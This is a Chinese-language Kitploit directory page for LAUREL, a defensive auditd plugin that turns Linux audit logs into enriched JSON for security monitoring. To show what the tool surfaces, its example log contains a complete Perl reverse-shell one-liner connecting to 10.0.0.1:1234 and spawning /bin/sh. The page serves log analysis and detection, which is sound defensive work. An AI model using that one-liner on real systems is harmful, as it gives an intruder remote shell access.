Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
laurel — 转换Linux审计日志以用于SIEM | Kitploit
工具/GitHubGitHub/threathunters-io/laurel
防御工具日志分析
GitHubthreathunters-io/laurel

laurel

转换Linux审计日志以用于SIEM

查看仓库
851653天前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

logo

Linux 审计 – 可用、健壮、简单日志

Build Status

LAUREL 是 auditd(8) 的事件后处理插件,可生成有用的、丰富化的 JSON 格式审计日志,适用于现代安全监控设置。

最新稳定版对应的文档可在此处找到。

为什么?

长话短说:与其像这样查看审计事件……

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

……LAUREL 将它们转换为 JSON 日志,使攻击者/渗透测试人员/红队试图制造的混乱一目了然:

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

这一切在源头发生,因为 LAUREL 运行在生成审计事件的主机上。事件会包含关于父进程(ppid)的有用信息:

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

文档

配置和操作细节在 laurel(8) 手册页中描述。 关于日志格式及其理由的详细信息,请参见 laurel-about(7) 手册页。laurel-audit-rules(7) 页面包含了审计规则配置的建议和示例,用于检测攻击者的战术。

LAUREL 安装说明包含了如何从源码构建 LAUREL 以及安装和配置它的指导。

我们开发 LAUREL 是因为对现有项目和产品的功能集及性能特性不满意。详情请参考性能文档。

参见

  • ansible-auditd-laurel,一个用于部署 auditd + laurel 的 Ansible 角色,由 @0xFustang / CERT-EU 编写

许可证

GNU 通用公共许可证,第3版

作者

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

Logo 由 Birgit Meyer <[email protected]> 创建。

下载工具